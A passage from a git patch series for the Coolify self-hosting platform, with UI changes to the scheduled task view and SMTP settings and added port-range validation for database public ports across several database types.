-                            <x-forms.input canGate="update" :canResource="$settings" required id="smtpPort" placeholder="587" label="Port" />
+                            <x-forms.input canGate="update" :canResource="$settings" required id="smtpPort" type="number" placeholder="587" label="Port" />
                             <x-forms.select canGate="update" :canResource="$settings" required id="smtpEncryption" label="Encryption">
                                 <option value="starttls">StartTLS</option>
                                 <option value="tls">TLS/SSL</option>
@@ -82,7 +82,7 @@ class="p-4 border dark:border-coolgray-300 border-neutral-200 rounded-lg flex fl
                         <div class="flex flex-col w-full gap-2 xl:flex-row">
                             <x-forms.input canGate="update" :canResource="$settings" id="smtpUsername" label="SMTP Username" />
                             <x-forms.input canGate="update" :canResource="$settings" id="smtpPassword" type="password" label="SMTP Password" />
-                            <x-forms.input canGate="update" :canResource="$settings" id="smtpTimeout" helper="Timeout value for sending emails."
+                            <x-forms.input canGate="update" :canResource="$settings" id="smtpTimeout" type="number"  helper="Timeout value for sending emails."
                                 label="Timeout" />
                         </div>
                     </div>
diff --git a/resources/views/livewire/settings-email.blade.php b/resources/views/livewire/settings-email.blade.php
index c58ea189d..93abd628c 100644
--- a/resources/views/livewire/settings-email.blade.php
+++ b/resources/views/livewire/settings-email.blade.php
@@ -53,7 +53,7 @@
                         <x-forms.input id="smtpUsername" label="SMTP Username" />
                         <x-forms.input id="smtpPassword" type="password" label="SMTP Password"
                             autocomplete="new-password" />
-                        <x-forms.input id="smtpTimeout" helper="Timeout value for sending emails." label="Timeout" />
+                        <x-forms.input id="smtpTimeout" type="number" helper="Timeout value for sending emails." label="Timeout" />
                     </div>
                 </div>
             </form>

From d33cd7ca71b5b49bb7943c23de2de609e9a7aa6e Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 15:27:40 +0530
Subject: [PATCH 185/213] fix(ui): keep sidebar visible on scheduled task
 single view

---
 app/Livewire/Project/Shared/ScheduledTask/Show.php     |  8 +++++++-
 .../project/application/configuration.blade.php        |  4 +++-
 .../livewire/project/service/configuration.blade.php   |  4 +++-
 .../project/shared/scheduled-task/show.blade.php       | 10 ----------
 routes/web.php                                         |  4 ++--
 5 files changed, 15 insertions(+), 15 deletions(-)

diff --git a/app/Livewire/Project/Shared/ScheduledTask/Show.php b/app/Livewire/Project/Shared/ScheduledTask/Show.php
index 02c13a66c..d99cd9727 100644
--- a/app/Livewire/Project/Shared/ScheduledTask/Show.php
+++ b/app/Livewire/Project/Shared/ScheduledTask/Show.php
@@ -52,9 +52,15 @@ class Show extends Component
     #[Locked]
     public string $task_uuid;
 
-    public function mount(string $task_uuid, string $project_uuid, string $environment_uuid, ?string $application_uuid = null, ?string $service_uuid = null)
+    public function mount()
     {
         try {
+            $task_uuid = request()->route('task_uuid');
+            $project_uuid = request()->route('project_uuid');
+            $environment_uuid = request()->route('environment_uuid');
+            $application_uuid = request()->route('application_uuid');
+            $service_uuid = request()->route('service_uuid');
+
             $this->task_uuid = $task_uuid;
             if ($application_uuid) {
                 $this->type = 'application';
diff --git a/resources/views/livewire/project/application/configuration.blade.php b/resources/views/livewire/project/application/configuration.blade.php
index 597bfa0a4..ce1d2057c 100644
--- a/resources/views/livewire/project/application/configuration.blade.php
+++ b/resources/views/livewire/project/application/configuration.blade.php
@@ -42,7 +42,7 @@
                     </span>
                 @endif
             </a>
-            <a class="sub-menu-item" {{ wireNavigate() }} wire:current.exact="menu-item-active"
+            <a @class(['sub-menu-item', 'menu-item-active' => str($currentRoute)->startsWith('project.application.scheduled-tasks')]) {{ wireNavigate() }}
                 href="{{ route('project.application.scheduled-tasks.show', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]) }}"><span class="menu-item-label">Scheduled Tasks</span></a>
             <a class="sub-menu-item" {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.application.webhooks', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'application_uuid' => $application->uuid]) }}"><span class="menu-item-label">Webhooks</span></a>
@@ -84,6 +84,8 @@
                 <livewire:project.shared.destination :resource="$application" />
             @elseif ($currentRoute === 'project.application.scheduled-tasks.show')
                 <livewire:project.shared.scheduled-task.all :resource="$application" />
+            @elseif ($currentRoute === 'project.application.scheduled-tasks')
+                <livewire:project.shared.scheduled-task.show />
             @elseif ($currentRoute === 'project.application.webhooks')
                 <livewire:project.shared.webhooks :resource="$application" />
             @elseif ($currentRoute === 'project.application.preview-deployments')
diff --git a/resources/views/livewire/project/service/configuration.blade.php b/resources/views/livewire/project/service/configuration.blade.php
index c54c537ba..ffe80b595 100644
--- a/resources/views/livewire/project/service/configuration.blade.php
+++ b/resources/views/livewire/project/service/configuration.blade.php
@@ -14,7 +14,7 @@
                 href="{{ route('project.service.environment-variables', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'service_uuid' => $service->uuid]) }}"><span class="menu-item-label">Environment Variables</span></a>
             <a class='sub-menu-item' wire:current.exact="menu-item-active" {{ wireNavigate() }}
                 href="{{ route('project.service.storages', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'service_uuid' => $service->uuid]) }}"><span class="menu-item-label">Persistent Storages</span></a>
-            <a class='sub-menu-item' wire:current.exact="menu-item-active" {{ wireNavigate() }}
+            <a @class(['sub-menu-item', 'menu-item-active' => str($currentRoute)->startsWith('project.service.scheduled-tasks')]) {{ wireNavigate() }}
                 href="{{ route('project.service.scheduled-tasks.show', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'service_uuid' => $service->uuid]) }}"><span class="menu-item-label">Scheduled Tasks</span></a>
             <a class='sub-menu-item' wire:current.exact="menu-item-active" {{ wireNavigate() }}
                 href="{{ route('project.service.webhooks', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'service_uuid' => $service->uuid]) }}"><span class="menu-item-label">Webhooks</span></a>
@@ -189,6 +189,8 @@ class="w-4 h-4 dark:text-warning text-coollabs"
                 @endforeach
             @elseif ($currentRoute === 'project.service.scheduled-tasks.show')
                 <livewire:project.shared.scheduled-task.all :resource="$service" />
+            @elseif ($currentRoute === 'project.service.scheduled-tasks')
+                <livewire:project.shared.scheduled-task.show />
             @elseif ($currentRoute === 'project.service.webhooks')
                 <livewire:project.shared.webhooks :resource="$service" />
             @elseif ($currentRoute === 'project.service.resource-operations')
diff --git a/resources/views/livewire/project/shared/scheduled-task/show.blade.php b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
index f312c0bf3..bd2d78c35 100644
--- a/resources/views/livewire/project/shared/scheduled-task/show.blade.php
+++ b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
@@ -1,14 +1,4 @@
 <div>
-    <x-slot:title>
-        {{ data_get_str($resource, 'name')->limit(10) }} > Scheduled Tasks | Coolify
-    </x-slot>
-    @if ($type === 'application')
-        <h1>Scheduled Task</h1>
-        <livewire:project.application.heading :application="$resource" />
-    @elseif ($type === 'service')
-        <livewire:project.service.heading :service="$resource" :parameters="$parameters" />
-    @endif
-
     <form wire:submit="submit" class="w-full">
         <div class="flex flex-col gap-2 pb-2">
             <div class="flex gap-2 items-end">
diff --git a/routes/web.php b/routes/web.php
index a82fcc19e..ec2c45e50 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -230,7 +230,7 @@
         Route::get('/deployment/{deployment_uuid}', DeploymentShow::class)->name('project.application.deployment.show');
         Route::get('/logs', Logs::class)->name('project.application.logs');
         Route::get('/terminal', ExecuteContainerCommand::class)->name('project.application.command')->middleware('can.access.terminal');
-        Route::get('/tasks/{task_uuid}', ScheduledTaskShow::class)->name('project.application.scheduled-tasks');
+        Route::get('/tasks/{task_uuid}', ApplicationConfiguration::class)->name('project.application.scheduled-tasks');
     });
     Route::prefix('project/{project_uuid}/environment/{environment_uuid}/database/{database_uuid}')->group(function () {
         Route::get('/', DatabaseConfiguration::class)->name('project.database.configuration');
@@ -264,7 +264,7 @@
         Route::get('/{stack_service_uuid}/backups', ServiceDatabaseBackups::class)->name('project.service.database.backups');
         Route::get('/{stack_service_uuid}/import', ServiceIndex::class)->name('project.service.database.import')->middleware('can.update.resource');
         Route::get('/{stack_service_uuid}', ServiceIndex::class)->name('project.service.index');
-        Route::get('/tasks/{task_uuid}', ScheduledTaskShow::class)->name('project.service.scheduled-tasks');
+        Route::get('/tasks/{task_uuid}', ServiceConfiguration::class)->name('project.service.scheduled-tasks');
     });
 
     Route::get('/servers', ServerIndex::class)->name('server.index');

From 1f864dc49b9fe9bcb1f16b304a0f8f1897e98faf Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 15:29:17 +0530
Subject: [PATCH 186/213] feat(ui): show task name on title for scheduled task
 single view

---
 .../views/livewire/project/shared/scheduled-task/show.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/livewire/project/shared/scheduled-task/show.blade.php b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
index bd2d78c35..635b6c14b 100644
--- a/resources/views/livewire/project/shared/scheduled-task/show.blade.php
+++ b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
@@ -2,7 +2,7 @@
     <form wire:submit="submit" class="w-full">
         <div class="flex flex-col gap-2 pb-2">
             <div class="flex gap-2 items-end">
-                <h2>Scheduled Task</h2>
+                <h2>Task {{ $task->name }}</h2>
                 <x-forms.button type="submit">
                     Save
                 </x-forms.button>

From 5037497ada07f2c85960cbef5a31a90284707878 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 15:36:32 +0530
Subject: [PATCH 187/213] feat(ui): add enable/disable button for scheduled
 task

---
 app/Livewire/Project/Shared/ScheduledTask/Show.php  | 13 +++++++++++++
 .../project/shared/scheduled-task/show.blade.php    |  8 +++++---
 2 files changed, 18 insertions(+), 3 deletions(-)

diff --git a/app/Livewire/Project/Shared/ScheduledTask/Show.php b/app/Livewire/Project/Shared/ScheduledTask/Show.php
index d99cd9727..882737f09 100644
--- a/app/Livewire/Project/Shared/ScheduledTask/Show.php
+++ b/app/Livewire/Project/Shared/ScheduledTask/Show.php
@@ -111,6 +111,19 @@ public function syncData(bool $toModel = false)
         }
     }
 
+    public function toggleEnabled()
+    {
+        try {
+            $this->authorize('update', $this->resource);
+            $this->isEnabled = ! $this->isEnabled;
+            $this->task->enabled = $this->isEnabled;
+            $this->task->save();
+            $this->dispatch('success', $this->isEnabled ? 'Scheduled task enabled.' : 'Scheduled task disabled.');
+        } catch (\Exception $e) {
+            return handleError($e);
+        }
+    }
+
     public function instantSave()
     {
         try {
diff --git a/resources/views/livewire/project/shared/scheduled-task/show.blade.php b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
index 635b6c14b..1e727f6c3 100644
--- a/resources/views/livewire/project/shared/scheduled-task/show.blade.php
+++ b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
@@ -11,6 +11,11 @@
                         Execute Now
                     </x-forms.button>
                 @endif
+                @if (!$isEnabled)
+                    <x-forms.button wire:click="toggleEnabled" isHighlighted>Enable Task</x-forms.button>
+                @else
+                    <x-forms.button wire:click="toggleEnabled">Disable Task</x-forms.button>
+                @endif
                 <x-modal-confirmation title="Confirm Scheduled Task Deletion?" isErrorButton buttonTitle="Delete"
                     submitAction="delete({{ $task->id }})" :actions="['The selected scheduled task will be permanently deleted.']" confirmationText="{{ $task->name }}"
                     confirmationLabel="Please confirm the execution of the actions by entering the Scheduled Task Name below"
@@ -18,9 +23,6 @@
                     step2ButtonText="Permanently Delete" />
 
             </div>
-            <div class="w-48">
-                <x-forms.checkbox instantSave id="isEnabled" label="Enabled" />
-            </div>
             <div class="flex gap-2 w-full">
                 <x-forms.input placeholder="Name" id="name" label="Name" required />
                 <x-forms.input placeholder="php artisan schedule:run" id="command" label="Command" required />

From 401227932e1382878e8d2626c9327ce900eb383c Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 15:43:46 +0530
Subject: [PATCH 188/213] feat(ui): reorganize scheduled task single view
 layout

---
 .../livewire/project/shared/scheduled-task/show.blade.php      | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/resources/views/livewire/project/shared/scheduled-task/show.blade.php b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
index 1e727f6c3..ceee6466e 100644
--- a/resources/views/livewire/project/shared/scheduled-task/show.blade.php
+++ b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
@@ -23,9 +23,9 @@
                     step2ButtonText="Permanently Delete" />
 
             </div>
+            <h3 class="pt-4">Configuration</h3>
             <div class="flex gap-2 w-full">
                 <x-forms.input placeholder="Name" id="name" label="Name" required />
-                <x-forms.input placeholder="php artisan schedule:run" id="command" label="Command" required />
                 <x-forms.input placeholder="0 0 * * * or daily" id="frequency" label="Frequency" required />
                 <x-forms.input type="number" placeholder="300" id="timeout"
                     helper="Maximum execution time in seconds (60-36000)." label="Timeout (seconds)" required />
@@ -39,6 +39,7 @@
                         id="container" label="Service name" />
                 @endif
             </div>
+            <x-forms.input placeholder="php artisan schedule:run" id="command" label="Command" required />
     </form>
 
     <div class="pt-4">

From a1e5357870a9c9652afdb2097b2c253c19dafa11 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 15:46:11 +0530
Subject: [PATCH 189/213] feat(ui): add helper text for frequency input on
 scheduled task view

---
 .../livewire/project/shared/scheduled-task/show.blade.php      | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/resources/views/livewire/project/shared/scheduled-task/show.blade.php b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
index ceee6466e..c699609c0 100644
--- a/resources/views/livewire/project/shared/scheduled-task/show.blade.php
+++ b/resources/views/livewire/project/shared/scheduled-task/show.blade.php
@@ -26,7 +26,8 @@
             <h3 class="pt-4">Configuration</h3>
             <div class="flex gap-2 w-full">
                 <x-forms.input placeholder="Name" id="name" label="Name" required />
-                <x-forms.input placeholder="0 0 * * * or daily" id="frequency" label="Frequency" required />
+                <x-forms.input placeholder="0 0 * * * or daily" id="frequency" label="Frequency"
+                    helper="You can use every_minute, hourly, daily, weekly, monthly, yearly or a cron expression." required />
                 <x-forms.input type="number" placeholder="300" id="timeout"
                     helper="Maximum execution time in seconds (60-36000)." label="Timeout (seconds)" required />
                 @if ($type === 'application')

From c9f20ba2a2cda142a676c980fcf2db376e75f962 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sun, 29 Mar 2026 19:11:28 +0530
Subject: [PATCH 190/213] fix(validation): add input validation for database
 public port and proxy timeout

---
 app/Livewire/Project/Database/Clickhouse/General.php | 12 +++++++-----
 app/Livewire/Project/Database/Dragonfly/General.php  | 12 +++++++-----
 app/Livewire/Project/Database/Keydb/General.php      | 12 +++++++-----
 app/Livewire/Project/Database/Mariadb/General.php    | 12 +++++++-----
 app/Livewire/Project/Database/Mongodb/General.php    | 12 +++++++-----
 app/Livewire/Project/Database/Mysql/General.php      | 12 +++++++-----
 app/Livewire/Project/Database/Postgresql/General.php | 12 +++++++-----
 app/Livewire/Project/Database/Redis/General.php      | 12 +++++++-----
 app/Livewire/Project/Service/Index.php               | 10 +++++-----
 .../project/database/clickhouse/general.blade.php    |  4 ++--
 .../project/database/dragonfly/general.blade.php     |  4 ++--
 .../project/database/keydb/general.blade.php         |  4 ++--
 .../project/database/mariadb/general.blade.php       |  4 ++--
 .../project/database/mongodb/general.blade.php       |  4 ++--
 .../project/database/mysql/general.blade.php         |  4 ++--
 .../project/database/postgresql/general.blade.php    |  4 ++--
 .../project/database/redis/general.blade.php         |  4 ++--
 .../views/livewire/project/service/index.blade.php   |  2 +-
 18 files changed, 78 insertions(+), 62 deletions(-)

diff --git a/app/Livewire/Project/Database/Clickhouse/General.php b/app/Livewire/Project/Database/Clickhouse/General.php
index 9de75c1c5..ffce8c9bd 100644
--- a/app/Livewire/Project/Database/Clickhouse/General.php
+++ b/app/Livewire/Project/Database/Clickhouse/General.php
@@ -34,9 +34,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public ?string $customDockerRunOptions = null;
 
@@ -81,7 +81,7 @@ protected function rules(): array
             'image' => 'required|string',
             'portsMappings' => 'nullable|string',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'customDockerRunOptions' => 'nullable|string',
             'dbUrl' => 'nullable|string',
@@ -102,6 +102,8 @@ protected function messages(): array
                 'image.required' => 'The Docker Image field is required.',
                 'image.string' => 'The Docker Image must be a string.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
             ]
@@ -119,8 +121,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->save();
diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index d35e57a9d..0a1635fce 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -34,9 +34,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public ?string $customDockerRunOptions = null;
 
@@ -92,7 +92,7 @@ protected function rules(): array
             'image' => 'required|string',
             'portsMappings' => 'nullable|string',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'customDockerRunOptions' => 'nullable|string',
             'dbUrl' => 'nullable|string',
@@ -112,6 +112,8 @@ protected function messages(): array
                 'image.required' => 'The Docker Image field is required.',
                 'image.string' => 'The Docker Image must be a string.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
             ]
@@ -128,8 +130,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->enable_ssl = $this->enable_ssl;
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index adb4ccb5f..774b403c8 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -36,9 +36,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public ?string $customDockerRunOptions = null;
 
@@ -95,7 +95,7 @@ protected function rules(): array
             'image' => 'required|string',
             'portsMappings' => 'nullable|string',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'customDockerRunOptions' => 'nullable|string',
             'dbUrl' => 'nullable|string',
@@ -117,6 +117,8 @@ protected function messages(): array
                 'image.required' => 'The Docker Image field is required.',
                 'image.string' => 'The Docker Image must be a string.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
             ]
@@ -134,8 +136,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->enable_ssl = $this->enable_ssl;
diff --git a/app/Livewire/Project/Database/Mariadb/General.php b/app/Livewire/Project/Database/Mariadb/General.php
index 14240c82d..49772cdc8 100644
--- a/app/Livewire/Project/Database/Mariadb/General.php
+++ b/app/Livewire/Project/Database/Mariadb/General.php
@@ -42,9 +42,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public bool $isLogDrainEnabled = false;
 
@@ -80,7 +80,7 @@ protected function rules(): array
             'image' => 'required',
             'portsMappings' => 'nullable',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
@@ -100,6 +100,8 @@ protected function messages(): array
                 'mariadbDatabase.required' => 'The MariaDB Database field is required.',
                 'image.required' => 'The Docker Image field is required.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
             ]
@@ -159,8 +161,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->enable_ssl = $this->enableSsl;
diff --git a/app/Livewire/Project/Database/Mongodb/General.php b/app/Livewire/Project/Database/Mongodb/General.php
index 11419ec71..bfa212a6d 100644
--- a/app/Livewire/Project/Database/Mongodb/General.php
+++ b/app/Livewire/Project/Database/Mongodb/General.php
@@ -40,9 +40,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public bool $isLogDrainEnabled = false;
 
@@ -79,7 +79,7 @@ protected function rules(): array
             'image' => 'required',
             'portsMappings' => 'nullable',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
@@ -99,6 +99,8 @@ protected function messages(): array
                 'mongoInitdbDatabase.required' => 'The MongoDB Database field is required.',
                 'image.required' => 'The Docker Image field is required.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
                 'sslMode.in' => 'The SSL Mode must be one of: allow, prefer, require, verify-full.',
@@ -158,8 +160,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->enable_ssl = $this->enableSsl;
diff --git a/app/Livewire/Project/Database/Mysql/General.php b/app/Livewire/Project/Database/Mysql/General.php
index 4f0f5eb19..13ca3160a 100644
--- a/app/Livewire/Project/Database/Mysql/General.php
+++ b/app/Livewire/Project/Database/Mysql/General.php
@@ -42,9 +42,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public bool $isLogDrainEnabled = false;
 
@@ -82,7 +82,7 @@ protected function rules(): array
             'image' => 'required',
             'portsMappings' => 'nullable',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
@@ -103,6 +103,8 @@ protected function messages(): array
                 'mysqlDatabase.required' => 'The MySQL Database field is required.',
                 'image.required' => 'The Docker Image field is required.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
                 'sslMode.in' => 'The SSL Mode must be one of: PREFERRED, REQUIRED, VERIFY_CA, VERIFY_IDENTITY.',
@@ -164,8 +166,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->enable_ssl = $this->enableSsl;
diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php
index 4e044672b..2205b7287 100644
--- a/app/Livewire/Project/Database/Postgresql/General.php
+++ b/app/Livewire/Project/Database/Postgresql/General.php
@@ -46,9 +46,9 @@ class General extends Component
 
     public ?bool $isPublic = null;
 
-    public ?int $publicPort = null;
+    public mixed $publicPort = null;
 
-    public ?int $publicPortTimeout = 3600;
+    public mixed $publicPortTimeout = 3600;
 
     public bool $isLogDrainEnabled = false;
 
@@ -94,7 +94,7 @@ protected function rules(): array
             'image' => 'required',
             'portsMappings' => 'nullable',
             'isPublic' => 'nullable|boolean',
-            'publicPort' => 'nullable|integer',
+            'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
@@ -114,6 +114,8 @@ protected function messages(): array
                 'postgresDb.required' => 'The Postgres Database field is required.',
                 'image.required' => 'The Docker Image field is required.',
                 'publicPort.integer' => 'The Public Port must be an integer.',
+                'publicPort.min' => 'The Public Port must be at least 1.',
+                'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
                 'sslMode.in' => 'The SSL Mode must be one of: allow, prefer, require, verify-ca, verify-full.',
@@ -179,8 +181,8 @@ public function syncData(bool $toModel = false)
             $this->database->image = $this->image;
             $this->database->ports_mappings = $this->portsMappings;
             $this->database->is_public = $this->isPublic;
-            $this->database->public_port = $this->publicPort;
-            $this->database->public_port_timeout = $this->publicPortTimeout;
+            $this->database->public_port = $this->publicPort ?: null;
+            $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->enable_ssl = $this->enableSsl;
diff --git a/app/Livewire/Project/Database/Redis/General.php b/app/Livewire/Project/Database/Redis/General.php
